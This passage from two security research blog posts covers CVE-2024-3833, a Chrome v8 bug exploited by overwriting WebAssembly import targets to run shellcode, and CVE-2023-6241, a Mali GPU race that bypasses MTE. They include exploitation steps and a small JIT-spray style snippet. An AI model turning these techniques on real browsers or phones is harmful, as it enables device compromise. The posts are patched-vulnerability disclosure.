    call $i
  )

To implement this in v8, when the WebAssembly.Instance is created, a FixedAddressArray was used to store addresses of imported functions:


Handle<WasmTrustedInstanceData> WasmTrustedInstanceData::New(
    Isolate* isolate, Handle<WasmModuleObject> module_object) {
  ...
  const WasmModule* module = module_object->module();

  int num_imported_functions = module->num_imported_functions;
  Handle<FixedAddressArray> imported_function_targets =
      FixedAddressArray::New(isolate, num_imported_functions);
  ...

Which is then used as the call target when the imported function is called. As this FixedAddressArray lives in the v8 heap, it can easily be modified once I’ve gained arbitrary read and write primitives in the v8 heap. I can therefore rewrite the imported function targets, so that when an imported function is called in WebAssembly code, it’ll jump to the address of some shell code that I prepared to gain code execution.

In particular, if the imported function is a Javascript Math function, then some wrapper code is compiled and used as a call target in imported_function_targets:


bool InstanceBuilder::ProcessImportedFunction(
    Handle<WasmTrustedInstanceData> trusted_instance_data, int import_index,
    int func_index, Handle<String> module_name, Handle<String> import_name,
    Handle<Object> value, WellKnownImport preknown_import) {
    ...
    default: {
      ...
      WasmCode* wasm_code =
          native_module->import_wrapper_cache()->Get(...);
      if (wasm_code->kind() == WasmCode::kWasmToJsWrapper) {
        ...
      } else {
        // Wasm math intrinsics are compiled as regular Wasm functions.
        DCHECK(kind >= ImportCallKind::kFirstMathIntrinsic &&
               kind <= ImportCallKind::kLastMathIntrinsic);
        ...
        imported_entry.SetWasmToWasm(trusted_instance_data->instance_object(),
                                     wasm_code->instruction_start());
      }

As the compiled wrapper code is stored in the same rx region as other WebAssembly code compiled by the Liftoff compiler, I can create WebAssembly functions that store numerical data, and rewrite imported_function_targets to jump into the middle of this data so that it gets interpreted as code and executed. The idea is similar to JIT spraying, which was a method to bypass the heap sandbox but has since been patched. As the wrapper code and the WebAssembly code that I compiled are in the same region, the offsets between them can be computed, which allows me to jump precisely to the data in the WebAssembly code that I crafted to execute arbitrary shell code.
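The data-as-code trick can be illustrated as follows (a sketch under my own assumptions: the byte values are arbitrary placeholders, not real shellcode; it only shows that instruction bytes survive a round trip through an f64 constant):

```javascript
// Eight placeholder "instruction" bytes encoded as the IEEE-754 double
// that a wasm module would declare via `f64.const`; Liftoff embeds the
// constant's bytes verbatim in the compiled function, so jumping into
// the middle of the constant executes them.
const insnBytes = new Uint8Array([0x48, 0x31, 0xc0, 0x48, 0xff, 0xc0, 0x90, 0xc3]);
const asDouble = new Float64Array(insnBytes.buffer)[0];

// Round-tripping through the double preserves the bytes exactly (the
// value is not a NaN, so no canonicalization occurs):
const recovered = new Uint8Array(new Float64Array([asDouble]).buffer);
```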

The exploit can be found here with some set-up notes.

Conclusion

In this post, I’ve looked at CVE-2024-3833, a bug that allows duplicate properties to be created in a v8 object, which is similar to the bug CVE-2021-30561. While the method to exploit duplicate properties in CVE-2021-30561 is no longer available due to code hardening, I was able to exploit the bug in a different way.

  1. First transfer the duplicate properties into an inconsistency between an object’s PropertyArray and its map.
  2. This then turns into an OOB write of the PropertyArray, which I then used to create a type confusion between a Javascript Object and a Javascript Array.
  3. Once such type confusion is achieved, I can rewrite the length of the type confused Javascript Array. This then becomes an OOB access in a Javascript Array.

Once an OOB access in an Javascript Array (corrupted_arr) is achieved, it is fairly standard to turn this into an arbitrary read and write inside the v8 heap. It essentially consists of the following steps:

  1. First, place an Object Array after corrupted_arr, and use the OOB read primitive in corrupted_arr to read the addresses of the objects stored in this array. This allows me to obtain the address of any V8 object.
  2. Place another double array, writeArr after corrupted_arr, and use the OOB write primitive in corrupted_arr to overwrite the element field of writeArr to an object address. Accessing the elements of writeArr then allows me to read/write to arbitrary addresses.

As v8 has recently implemented the v8 heap sandbox, getting arbitrary memory read and write in the v8 heap is not sufficient to achieve code execution. In order to achieve code execution, I overwrite jump targets of WebAssembly imported functions, which were stored in the v8 heap. By rewriting the jump targets to locations of shell code, I can execute arbitrary code calling imported functions in a WebAssembly module.

The post Attack of the clones: Getting RCE in Chrome’s renderer with duplicate object properties appeared first on The GitHub Blog.

Gaining kernel code execution on an MTE-enabled Pixel 8 https://github.blog/security/vulnerability-research/gaining-kernel-code-execution-on-an-mte-enabled-pixel-8/ Mon, 18 Mar 2024 15:00:55 +0000 https://github.blog/?p=77004 In this post, I’ll look at CVE-2023-6241, a vulnerability in the Arm Mali GPU that allows a malicious app to gain arbitrary kernel code execution and root on an Android phone. I’ll show how this vulnerability can be exploited even when Memory Tagging Extension (MTE), a powerful mitigation, is enabled on the device.

The post Gaining kernel code execution on an MTE-enabled Pixel 8 appeared first on The GitHub Blog.

In this post, I’ll look at CVE-2023-6241, a vulnerability in the Arm Mali GPU that I reported to Arm on November 15, 2023 and was fixed in the Arm Mali driver version r47p0, which was released publicly on December 14, 2023. It was fixed in Android in the March security update. When exploited, this vulnerability allows a malicious Android app to gain arbitrary kernel code execution and root on the device. The vulnerability affects devices with newer Arm Mali GPUs that use the Command Stream Frontend (CSF) feature, such as Google’s Pixel 7 and Pixel 8 phones. What is interesting about this vulnerability is that it is a logic bug in the memory management unit of the Arm Mali GPU and it is capable of bypassing Memory Tagging Extension (MTE), a new and powerful mitigation against memory corruption that was first supported in Pixel 8. In this post, I’ll show how to use this bug to gain arbitrary kernel code execution in the Pixel 8 from an untrusted user application. I have confirmed that the exploit works successfully even with kernel MTE enabled by following these instructions.

Arm64 MTE

MTE is a very well documented feature on newer Arm processors that uses hardware implementations to check for memory corruption. As there are already many good articles about MTE, I’ll only briefly go through the idea of MTE and explain its significance in comparison to other mitigations for memory corruption. Readers who are interested in more details can, for example, consult this article and the whitepaper released by Arm.

While the Arm64 architecture uses 64 bit pointers to access memory, there is usually no need to use such a large address space. In practice, most applications use a much smaller address space (usually 52 bits or less). This leaves the highest bits in a pointer unused. The main idea of memory tagging is to use these higher bits in an address to store a “tag” that can then be checked against the tag stored in the memory block associated with the address. This helps to mitigate common types of memory corruption as follows:

In the case of a linear overflow, a pointer is used to dereference an adjacent memory block that has a different tag compared to the one stored in the pointer. By checking these tags at dereference time, the corrupted dereference can be detected. For use-after-free type memory corruptions, as long as the tag in a memory block is cleared every time it is freed and a new tag reassigned when it is allocated, dereferencing an already freed and reclaimed object will also lead to a discrepancy between pointer tag and the tag in memory, which allows use-after-free to be detected.

(The above image is from Memory Tagging Extension: Enhancing memory safety through architecture published by Arm.)
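A toy model of the tag check (my own simplification, assuming 4-bit tags stored in bits 56-59 of the pointer and 16-byte tag granules):

```javascript
// Simulated MTE: memory granules carry a tag, pointers carry a tag in
// their unused high bits, and every dereference compares the two.
const TAG_SHIFT = 56n;
const granuleTags = new Map();                    // granule index -> tag

function mteTag(addr, t) {                        // tag memory + pointer
  granuleTags.set(addr >> 4n, t);
  return addr | (t << TAG_SHIFT);
}

function mteCheck(ptr) {                          // done in hardware
  const t = (ptr >> TAG_SHIFT) & 0xFn;
  const addr = ptr & ((1n << TAG_SHIFT) - 1n);
  return granuleTags.get(addr >> 4n) === t;       // mismatch => fault
}

const a = mteTag(0x1000n, 0x5n);  // allocation A, tag 5
mteTag(0x1010n, 0xAn);            // adjacent allocation B, tag 0xA

// An in-bounds access passes; a linear overflow from A into B is caught
// because the pointer still carries A's tag:
const inBounds = mteCheck(a);          // true
const overflow = mteCheck(a + 0x10n);  // false
```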

The main reason that memory tagging is different from previous mitigations, such as Kernel Control Flow Integrity (kCFI), is that, unlike other mitigations, which disrupt later stages of an exploit, MTE is a very early stage mitigation that tries to catch memory corruption when it first happens. As such, it is able to stop an exploit at a very early stage, before the attacker has gained any capabilities, and it is therefore very difficult to bypass. It introduces checks that effectively turn a memory-unsafe language into one that is memory safe, albeit probabilistically.

In theory, memory tagging can be implemented in software alone, by making the memory allocator assign and remove tags every time memory is allocated or freed, and by adding tag checking logic when dereferencing pointers. Doing so, however, incurs a performance cost that makes it unsuitable for production use. As a result, hardware implementation is needed to reduce the performance cost and make memory tagging viable for production use. The hardware support was introduced in the v8.5a version of the Arm architecture, in which extra hardware instructions (called MTE) were introduced to perform tagging and checking. For Android devices, most chipsets that support MTE use Arm v9 processors (instead of Arm v8.5a), and currently only a handful of devices support MTE.

One of the limitations of MTE is that the number of available unused bits is small compared to the number of memory blocks that can ever be allocated. As such, tag collisions are inevitable and many memory blocks will share the same tag. This means that a corrupted memory access may still succeed by chance. In practice, even when using only 4 bits for the tag, the success rate is reduced to 1/16, which is still a fairly strong protection against memory corruption. Another limitation is that, by leaking pointer and memory block values using side channel attacks such as Spectre, an attacker may be able to ensure that a corrupted memory access is done with the correct tag and thus bypasses MTE. This type of leak, however, is mostly only available to a local attacker. The series of articles MTE As Implemented, by Mark Brand, includes an in-depth study of the limitations and impact of MTE on various attack scenarios.

Apart from having hardware that uses processors implementing Arm v8.5a or above, software support is also required to enable MTE. Currently, only Google’s Pixel 8 allows users to enable MTE in the developer options, and MTE is disabled by default. Extra steps are also required to enable MTE in the kernel.

The Arm Mali GPU

The Arm Mali GPU can be integrated in various devices, (for example, see “Implementations” in Mali (GPU) Wikipedia entry). It has been an attractive target on Android phones and has been targeted by in-the-wild exploits multiple times. The current vulnerability is closely related to another issue that I reported and is a vulnerability in the handling of a type of GPU memory called JIT memory. I’ll now briefly explain JIT memory and explain the vulnerability CVE-2023-6241.

JIT memory in Arm Mali

When using the Mali GPU driver, a user app first needs to create and initialize a kbase_context kernel object. This involves the user app opening the driver file and using the resulting file descriptor to make a series of ioctl calls. A kbase_context object is responsible for managing resources for each driver file that is opened and is unique for each file handle.

In particular, the kbase_context manages different types of memory that are shared between the GPU device and user space applications. User applications can either map their own memory to the memory space of the GPU so the GPU can access this memory, or they can allocate memory from the GPU. Memory allocated by the GPU is managed by the kbase_context and can be mapped to the GPU memory space and also mapped to user space. A user application can also use the GPU to access mapped memory by submitting commands to the GPU.

In general, memory needs to be either allocated and managed by the GPU (native memory) or imported to the GPU from user space, and then mapped to the GPU address space before it can be accessed by the GPU. A memory region in the Mali GPU is represented by the kbase_va_region.

Similar to virtual memory in the CPU, a memory region in the GPU may not have its entire range backed by physical memory. The nr_pages field in a kbase_va_region specifies the virtual size of the memory region, whereas gpu_alloc->nents is the actual number of physical pages that are backing the region. I’ll refer to these pages as the backing pages of the region from now on. While the virtual size of a memory region is fixed, its physical size can change. From now on, when I use terminologies such as resize, grow and shrink regarding a memory region, what I mean is that the physical size of the region is resizing, growing or shrinking.

The JIT memory is a type of native memory whose lifetime is managed by the kernel driver. User applications request the GPU to allocate and free JIT memory by sending relevant commands to the GPU. While most commands, such as those using the GPU to perform arithmetic and memory accesses, are executed on the GPU itself, there are some commands, such as the ones used for managing JIT memory, that are implemented in the kernel and executed on the CPU. These are called software commands (in contrast to hardware commands that are executed on the GPU (hardware)).

On GPUs that use the Command Stream Frontend (CSF), software commands and hardware commands are placed on different types of command queues. To submit a software command, a kbase_kcpu_command_queue is needed and it can be created by using the KBASE_IOCTL_KCPU_QUEUE_CREATE ioctl. A software command can then be queued using the KBASE_IOCTL_KCPU_QUEUE_ENQUEUE command. To allocate or free JIT memory, commands of type BASE_KCPU_COMMAND_TYPE_JIT_ALLOC and BASE_KCPU_COMMAND_TYPE_JIT_FREE can be used.

The BASE_KCPU_COMMAND_TYPE_JIT_ALLOC command uses kbase_jit_allocate to allocate JIT memory. Similarly, the command BASE_KCPU_COMMAND_TYPE_JIT_FREE can be used to free JIT memory. As explained in the section “The life cycle of JIT memory” in one of my previous posts, when JIT memory is freed, it goes into a memory pool managed by the kbase_context and when kbase_jit_allocate is called, it first looks into this memory pool to see if there is any suitable freed JIT memory that can be reused:


struct kbase_va_region *kbase_jit_allocate(struct kbase_context *kctx,
    const struct base_jit_alloc_info *info,
    bool ignore_pressure_limit)
{
  ...
  kbase_gpu_vm_lock(kctx);
  mutex_lock(&kctx->jit_evict_lock);
  /*
   * Scan the pool for an existing allocation which meets our
   * requirements and remove it.
   */
  if (info->usage_id != 0)
    /* First scan for an allocation with the same usage ID */
    reg = find_reasonable_region(info, &kctx->jit_pool_head, false);
  ...
}

If an existing region is found and its virtual size matches the request, but its physical size is too small, then kbase_jit_allocate will attempt to allocate more physical pages to back the region by calling kbase_jit_grow:


struct kbase_va_region *kbase_jit_allocate(struct kbase_context *kctx,
    const struct base_jit_alloc_info *info,
    bool ignore_pressure_limit)
{
    ...
    /* kbase_jit_grow() can release & reacquire 'kctx->reg_lock',
     * so any state protected by that lock might need to be
     * re-evaluated if more code is added here in future.
     */
    ret = kbase_jit_grow(kctx, info, reg, prealloc_sas,
             mmu_sync_info);
   ...
}

If, on the other hand, no suitable region is found, kbase_jit_allocate will allocate JIT memory from scratch:


struct kbase_va_region *kbase_jit_allocate(struct kbase_context *kctx,
    const struct base_jit_alloc_info *info,
    bool ignore_pressure_limit)
{
    ...
  } else {
    /* No suitable JIT allocation was found so create a new one */
    u64 flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD |
        BASE_MEM_PROT_GPU_WR | BASE_MEM_GROW_ON_GPF |
        BASE_MEM_COHERENT_LOCAL |
        BASEP_MEM_NO_USER_FREE;
    u64 gpu_addr;
        ...
    mutex_unlock(&kctx->jit_evict_lock);
    kbase_gpu_vm_unlock(kctx);
    reg = kbase_mem_alloc(kctx, info->va_pages, info->commit_pages, info->extension,
              &flags, &gpu_addr, mmu_sync_info);
   ...
}

As we can see from the comment above the call to kbase_jit_grow, kbase_jit_grow can temporarily drop the kctx->reg_lock:


static int kbase_jit_grow(struct kbase_context *kctx,
 const struct base_jit_alloc_info *info,
 struct kbase_va_region *reg,
 struct kbase_sub_alloc **prealloc_sas,
 enum kbase_caller_mmu_sync_info mmu_sync_info)
{
    ...
  if (!kbase_mem_evictable_unmake(reg->gpu_alloc))
    goto update_failed;
    ...
  old_size = reg->gpu_alloc->nents;                      //<--------- 1.
  delta = info->commit_pages - reg->gpu_alloc->nents;    //<--------- 2.
  pages_required = delta;
    ...
  while (kbase_mem_pool_size(pool) < pages_required) {
    ...
    spin_unlock(&kctx->mem_partials_lock);
    kbase_gpu_vm_unlock(kctx);                        //<---------- lock dropped.
    ret = kbase_mem_pool_grow(pool, pool_delta);
    kbase_gpu_vm_lock(kctx);
        ...
}

In the above, we see that kbase_gpu_vm_unlock is called to temporarily drop the kctx->reg_lock, while kctx->mem_partials_lock is also dropped during a call to kbase_mem_pool_grow. In the Mali GPU, the kctx->reg_lock is used for protecting concurrent accesses to memory regions. So, for example, when kctx->reg_lock is held, the physical size of the memory region cannot be changed by another thread. In GHSL-2023-005 that I reported previously, I was able to trigger a race so that the JIT region was shrunk by using the KBASE_IOCTL_MEM_COMMIT ioctl from another thread while kbase_mem_pool_grow was running. This change in the size of the JIT region caused reg->gpu_alloc->nents to change after kbase_mem_pool_grow, meaning that the actual value of reg->gpu_alloc->nents was then different from the value that was cached in old_size and delta (1. and 2. in the above). As these values were later used to allocate and map the JIT region, using these stale values caused inconsistency in the GPU memory mapping, causing GHSL-2023-005.


static int kbase_jit_grow(struct kbase_context *kctx,
 const struct base_jit_alloc_info *info,
 struct kbase_va_region *reg,
 struct kbase_sub_alloc **prealloc_sas,
 enum kbase_caller_mmu_sync_info mmu_sync_info)
{
    ...
   //grow memory pool
    ...
    //delta used for allocating pages
    gpu_pages = kbase_alloc_phy_pages_helper_locked(reg->gpu_alloc, pool,
            delta, &prealloc_sas[0]);
    ...
    //old_size used for growing gpu mapping
    ret = kbase_mem_grow_gpu_mapping(kctx, reg, info->commit_pages,
            old_size);
    ...
}

After GHSL-2023-005 was patched, it was no longer possible to change the size of JIT memory using the KBASE_IOCTL_MEM_COMMIT ioctl.

The vulnerability

Similar to virtual memory, when an address in a memory region that is not backed by a physical page is accessed by the GPU, a memory access fault happens. In this case, depending on the type of the memory region, it may be possible to allocate and map a physical page on the fly to back the fault address. A GPU memory access fault is handled by the kbase_mmu_page_fault_worker:


void kbase_mmu_page_fault_worker(struct work_struct *data)
{
    ...
    kbase_gpu_vm_lock(kctx);
    ...
  if ((region->flags & GROWABLE_FLAGS_REQUIRED)
      != GROWABLE_FLAGS_REQUIRED) {
    kbase_gpu_vm_unlock(kctx);
    kbase_mmu_report_fault_and_kill(kctx, faulting_as,
        "Memory is not growable", fault);
    goto fault_done;
  }

  if ((region->flags & KBASE_REG_DONT_NEED)) {
    kbase_gpu_vm_unlock(kctx);
    kbase_mmu_report_fault_and_kill(kctx, faulting_as,
        "Don't need memory can't be grown", fault);
    goto fault_done;
  }

    ...
  spin_lock(&kctx->mem_partials_lock);
  grown = page_fault_try_alloc(kctx, region, new_pages, &pages_to_grow,
      &grow_2mb_pool, prealloc_sas);
  spin_unlock(&kctx->mem_partials_lock);
    ...
}

Within the fault handler, a number of checks are performed to ensure that the memory region is allowed to grow in size. The two checks that are relevant to JIT memory are the checks for the GROWABLE_FLAGS_REQUIRED and the KBASE_REG_DONT_NEED flags. The GROWABLE_FLAGS_REQUIRED is defined as follows:

#define GROWABLE_FLAGS_REQUIRED (KBASE_REG_PF_GROW | KBASE_REG_GPU_WR)

These flags are added to a JIT region when it is created by kbase_jit_allocate and are never changed:


struct kbase_va_region *kbase_jit_allocate(struct kbase_context *kctx,
    const struct base_jit_alloc_info *info,
    bool ignore_pressure_limit)
{
    ...
  } else {
    /* No suitable JIT allocation was found so create a new one */
    u64 flags = BASE_MEM_PROT_CPU_RD | BASE_MEM_PROT_GPU_RD |
        BASE_MEM_PROT_GPU_WR | BASE_MEM_GROW_ON_GPF |      //<----- KBASE_REG_PF_GROW and KBASE_REG_GPU_WR added
        BASE_MEM_COHERENT_LOCAL |
        BASEP_MEM_NO_USER_FREE;
    u64 gpu_addr;
        ...
    mutex_unlock(&kctx->jit_evict_lock);
    kbase_gpu_vm_unlock(kctx);
    reg = kbase_mem_alloc(kctx, info->va_pages, info->commit_pages, info->extension,
              &flags, &gpu_addr, mmu_sync_info);
   ...
}

While the KBASE_REG_DONT_NEED flag is added to a JIT region when it is freed, it is removed in kbase_jit_grow well before the kctx->reg_lock and kctx->mem_partials_lock are dropped and kbase_mem_pool_grow is called:


static int kbase_jit_grow(struct kbase_context *kctx,
 const struct base_jit_alloc_info *info,
 struct kbase_va_region *reg,
 struct kbase_sub_alloc **prealloc_sas,
 enum kbase_caller_mmu_sync_info mmu_sync_info)
{
  ...
  if (!kbase_mem_evictable_unmake(reg->gpu_alloc))    //<----- Remove KBASE_REG_DONT_NEED
  goto update_failed;
    ...
  while (kbase_mem_pool_size(pool) < pages_required) {
    ...
    spin_unlock(&kctx->mem_partials_lock);
    kbase_gpu_vm_unlock(kctx);
    ret = kbase_mem_pool_grow(pool, pool_delta);      //<----- race window: fault handler grows region
    kbase_gpu_vm_lock(kctx);
        ...
}

In particular, during the race window marked in the above snippet, the JIT memory reg is allowed to grow when a page fault happens.

So, by accessing unmapped memory in the region to create a fault on another thread while kbase_mem_pool_grow is running, I can cause the JIT region to be grown by the GPU fault handler while kbase_mem_pool_grow runs. This then changes reg->gpu_alloc->nents and invalidates old_size and delta in 1. and 2. below:


static int kbase_jit_grow(struct kbase_context *kctx,
 const struct base_jit_alloc_info *info,
 struct kbase_va_region *reg,
 struct kbase_sub_alloc **prealloc_sas,
 enum kbase_caller_mmu_sync_info mmu_sync_info)
{
    ...
  if (!kbase_mem_evictable_unmake(reg->gpu_alloc))
    goto update_failed;
    ...
  old_size = reg->gpu_alloc->nents;                      //<--------- 1.
  delta = info->commit_pages - reg->gpu_alloc->nents;    //<--------- 2.
  pages_required = delta;
    ...
  while (kbase_mem_pool_size(pool) < pages_required) {
    ...
    spin_unlock(&kctx->mem_partials_lock);
    kbase_gpu_vm_unlock(kctx);
    ret = kbase_mem_pool_grow(pool, pool_delta);  //<----- reg->gpu_alloc->nents changed by fault handler
    kbase_gpu_vm_lock(kctx);
        ...
   //delta used for allocating pages
    gpu_pages = kbase_alloc_phy_pages_helper_locked(reg->gpu_alloc, pool,
            delta, &prealloc_sas[0]);                     //<----- 3.
    ...
   //old_size used for growing gpu mapping
    ret = kbase_mem_grow_gpu_mapping(kctx, reg, info->commit_pages,        //<----- 4.
            old_size);
    ...
}

As a result, when delta and old_size are used in 3. and 4. to allocate backing pages and to map the pages to the GPU memory space, their values are invalid.

This is very similar to what happened with GHSL-2023-005. As kbase_mem_pool_grow involves large memory allocations, this race can be won very easily. There is, however, one very big difference: with GHSL-2023-005 I was able to shrink the JIT region, while in this case I am only able to grow it. To understand why this matters, let's have a brief recap of how my exploit for GHSL-2023-005 worked.

As mentioned before, the physical size, or the number of backing pages of a kbase_va_region is stored in the field reg->gpu_alloc->nents. A kbase_va_region has two kbase_mem_phy_alloc objects: the cpu_alloc and gpu_alloc that are responsible for managing its backing pages. For Android devices, these two fields are configured to be the same. Within kbase_mem_phy_alloc, the field pages is an array that contains the physical addresses of the backing pages, while nents specifies the length of the pages array:


struct kbase_mem_phy_alloc {
    ...
  size_t                nents;
  struct tagged_addr    *pages;
    ...
}

When kbase_alloc_phy_pages_helper_locked is called, it allocates memory pages and appends their physical addresses to the pages array, so the new pages are added at index nents onwards. The new size is then stored in nents. For example, when it is called in kbase_jit_grow, delta is the number of pages to add:


static int kbase_jit_grow(struct kbase_context *kctx,
 const struct base_jit_alloc_info *info,
 struct kbase_va_region *reg,
 struct kbase_sub_alloc **prealloc_sas,
 enum kbase_caller_mmu_sync_info mmu_sync_info)
{
    ...
   //delta use for allocating pages
    gpu_pages = kbase_alloc_phy_pages_helper_locked(reg->gpu_alloc, pool,
            delta, &prealloc_sas[0]);
    ...
}

In this case, delta pages are inserted at the index nents in the array pages of gpu_alloc:

After the backing pages are allocated and inserted into the pages array, the new pages are mapped to the GPU address space by calling kbase_mem_grow_gpu_mapping. The virtual address of a kbase_va_region in the GPU memory space is managed by the kbase_va_region itself and is stored in the fields start_pfn and nr_pages:


struct kbase_va_region {
    ...
  u64 start_pfn;
    ...
  size_t nr_pages;
    ...
}

The start of the virtual address of a kbase_va_region is stored in start_pfn (as a page frame number, so the actual address is start_pfn << PAGE_SHIFT, i.e. start_pfn * 0x1000), while nr_pages stores the size of the region. These fields remain unchanged after they are set. Within a kbase_va_region, the initial reg->gpu_alloc->nents pages in the virtual address space are backed by the physical memory stored in the gpu_alloc->pages array, while the rest of the addresses are not backed. In particular, the virtual addresses that are backed are always contiguous (so, no gaps between backed regions) and always start from the start of the region. For example, the following is possible:

While the following case is not allowed because the backing does not start from the beginning of the region:

and this following case is also not allowed because of the gaps in the addresses that are backed:
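The invariant illustrated by these three cases can be written down as a small check. This is a hypothetical helper, not driver code: backed[i] marks whether page i of the region is backed, and the invariant holds only when the backed pages form a gap-free prefix of length nents:

```c
#include <assert.h>
#include <stddef.h>

/* A region's backing is consistent only if exactly the first nents
 * pages are backed, contiguously from the start, with no gaps. */
static int backing_is_valid(const int *backed, size_t nr_pages,
                            size_t nents) {
  for (size_t i = 0; i < nr_pages; i++)
    if ((i < nents) != (backed[i] != 0))
      return 0;   /* gap inside the prefix, or backing past it */
  return 1;
}
```

A backed prefix passes; a backing that starts mid-region, or one with gaps, fails.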

In the case when kbase_mem_grow_gpu_mapping is called in kbase_jit_grow, the GPU addresses between (start_pfn + old_size) * 0x1000 to (start_pfn + info->commit_pages) * 0x1000 are mapped to the newly added pages in gpu_alloc->pages, which are the pages between indices pages + old_size and pages + info->commit_pages (because delta = info->commit_pages - old_size):


static int kbase_jit_grow(struct kbase_context *kctx,
 const struct base_jit_alloc_info *info,
 struct kbase_va_region *reg,
 struct kbase_sub_alloc **prealloc_sas,
 enum kbase_caller_mmu_sync_info mmu_sync_info)
{
    ...
    old_size = reg->gpu_alloc->nents;
    delta = info->commit_pages - reg->gpu_alloc->nents;
    ...
    //old_size used for growing gpu mapping
    ret = kbase_mem_grow_gpu_mapping(kctx, reg, info->commit_pages,
            old_size);
    ...
}

In particular, old_size here is used to specify both the GPU address where the new mapping should start, and also the offset from the pages array where backing pages should be used.

If reg->gpu_alloc->nents changes after old_size and delta are cached, then these offsets may become invalid. For example, if the kbase_va_region was shrunk and nents decreased after old_size and delta were stored, then kbase_alloc_phy_pages_helper_locked will insert delta pages to reg->gpu_alloc->pages + nents:

Similarly, kbase_mem_grow_gpu_mapping will map the GPU addresses starting from (start_pfn + old_size) * 0x1000, using the pages that are between reg->gpu_alloc->pages + old_size and reg->gpu_alloc->pages + nents + delta (dotted lines in the figure below). This means that the pages between reg->gpu_alloc->pages + nents and reg->gpu_alloc->pages + old_size don't end up getting mapped to any GPU addresses, while some addresses end up having no backing pages:

Exploiting GHSL-2023-005

GHSL-2023-005 enabled me to shrink the JIT region, but CVE-2023-6241 does not give me that capability. To understand how to exploit this issue, we need to know a bit more about how GPU mappings are removed. The function kbase_mmu_teardown_pgd_pages is responsible for removing address mappings from the GPU. This function essentially walks through a GPU address range and removes the addresses from the GPU page table by marking them as invalid. If it encounters a high level page table entry (PTE), which covers a large range of addresses, and finds that the entry is invalid, then it'll skip removing the entire range of addresses covered by the entry. For example, a level 2 page table entry covers a range of 512 pages, so if a level 2 page table entry is found to be invalid (1. in the below), then kbase_mmu_teardown_pgd_pages will assume the next 512 pages are covered by this level 2 entry and hence are all invalid already. As such, it'll skip removing these pages (2. in the below).


static int kbase_mmu_teardown_pgd_pages(struct kbase_device *kbdev, struct kbase_mmu_table *mmut,
          u64 vpfn, size_t nr, u64 *dirty_pgds,
          struct list_head *free_pgds_list,
          enum kbase_mmu_op_type flush_op)
{
        ...
        for (level = MIDGARD_MMU_TOPLEVEL;
             level <= MIDGARD_MMU_BOTTOMLEVEL; level++) {
            ...
            if (mmu_mode->ate_is_valid(page[index], level))
                break; /* keep the mapping */
            else if (!mmu_mode->pte_is_valid(page[index], level)) {  //<------ 1.
                /* nothing here, advance */
                switch (level) {
                ...
                case MIDGARD_MMU_LEVEL(2):
                    count = 512;            //<------- 2.
                    break;
                ...
                }
                if (count > nr)
                    count = nr;
                goto next;
            }
        ...
next:
        kunmap(phys_to_page(pgd));
        vpfn += count;
        nr -= count;

The function kbase_mmu_teardown_pgd_pages is called either when a kbase_va_region is shrunk or when it is deleted. As explained in the previous section, the virtual addresses in a kbase_va_region that are mapped and backed by physical pages must be contiguous from the start of the kbase_va_region. As a result, if any address in the region is mapped, then the start address must be mapped and hence the high level page table entry covering the start address must be valid (if no address in the region is mapped, then kbase_mmu_teardown_pgd_pages would not even be called):

In the above, the level 2 PTE that covers the start address of the region is mapped and so it is valid, therefore in this case, if kbase_mmu_teardown_pgd_pages ever encounters an unmapped high level PTE, the rest of the addresses in the kbase_va_region must have already been unmapped and can be skipped safely.

In the case where a region is shrunk, the address where the unmapping starts lies within the kbase_va_region, and the entire range between this start address and the end of the region will be unmapped. If the level 2 page table entry covering this address is invalid, then the start address must be in a region that is not mapped, and hence the rest of the address range to unmap must also not have been mapped. In this case, skipping of addresses is again safe:

So, as long as regions are only mapped from their start addresses and have no gaps in the mappings, kbase_mmu_teardown_pgd_pages will behave correctly.

In the case of GHSL-2023-005, it is possible to create a region that does not meet these conditions. For example, by shrinking the entire region to size zero during the race window, it is possible to create a region where the start of the region is unmapped:

When the region is deleted, and kbase_mmu_teardown_pgd_pages tries to remove the first address, because the level 2 PTE is invalid, it’ll skip the next 512 pages, some of which may actually have been mapped:

In this case, addresses in the “incorrectly skipped” region will remain mapped to some entries in the pages array in the gpu_alloc, which are already freed. And these “incorrectly skipped” GPU addresses can be used to access already freed memory pages.

Exploiting CVE-2023-6241

The situation, however, is very different when a region is grown during the race window. In this case, nents is larger than old_size when kbase_alloc_phy_pages_helper_locked and kbase_mem_grow_gpu_mapping are called, and delta pages are being inserted at index nents of the pages array:

The pages array contains the correct number of pages to back both the JIT grow and the fault access, and is in fact exactly how it would look if kbase_jit_grow had run after the page fault handler.

When kbase_mem_grow_gpu_mapping is called, delta pages are mapped to the GPU from (start_pfn + old_size) * 0x1000. As the total number of backing pages has now increased by fh + delta, where fh is the number of pages added by the fault handler, this leaves the last fh pages in the pages array unmapped.
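A simplified model of this arithmetic (toy_alloc and unmapped_tail are hypothetical, not driver code; fh is the number of pages added by the fault handler during the race) shows that exactly fh pages end up at the tail of the pages array with no GPU mapping:

```c
#include <assert.h>
#include <stddef.h>

struct toy_alloc { size_t nents; };

/* Returns how many pages at the end of the pages array end up with no
 * GPU mapping: the fault handler grows nents during the lock drop,
 * but the mapping still uses the stale old_size and delta. */
static size_t unmapped_tail(struct toy_alloc *a, size_t commit_pages,
                            size_t fh) {
  size_t old_size = a->nents;                 /* cached before the race */
  size_t delta = commit_pages - a->nents;     /* cached before the race */
  a->nents += fh;       /* fault handler grows the region in the window */
  a->nents += delta;    /* delta pages appended at index nents */
  size_t mapped_end = old_size + delta;  /* stale values used for mapping */
  return a->nents - mapped_end;          /* always equals fh */
}
```

With old_size = 4, commit_pages = 10 and fh = 3, the region ends up with 13 backing pages but only the first 10 mapped.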

This, however, does not seem to create any problem either. The memory region still only has its start addresses mapped and there is no gap in the mapping. The pages that are not mapped are simply not accessible from the GPU and will get freed when the memory region is deleted, so it isn’t even a memory leak issue.

However, not all is lost. As we have seen, when a GPU page fault happens, if the cause of the fault is that the address is not mapped, then the fault handler will try to add backing pages to the region and map these new pages to the extent of the region. If the fault address is, say fault_addr, then the minimum number of pages to add is new_pages = fault_addr/0x1000 - reg->gpu_alloc->nents. Depending on the kbase_va_region, some padding may also be added. In any case, these new pages will be mapped to the GPU, starting from the address (start_pfn + reg->gpu_alloc->nents) * 0x1000, so as to preserve the fact that only the addresses at the start of a region are mapped.
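The minimum-growth computation above can be sketched as a one-liner (fault_new_pages is a hypothetical helper; the real handler may add padding on top of this minimum):

```c
#include <stddef.h>

/* Minimum number of pages the fault handler must add so that the
 * faulting address becomes backed; pages are 0x1000 bytes and
 * fault_addr is an offset from the start of the region. */
static size_t fault_new_pages(size_t fault_addr, size_t nents) {
  return fault_addr / 0x1000 - nents;
}
```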

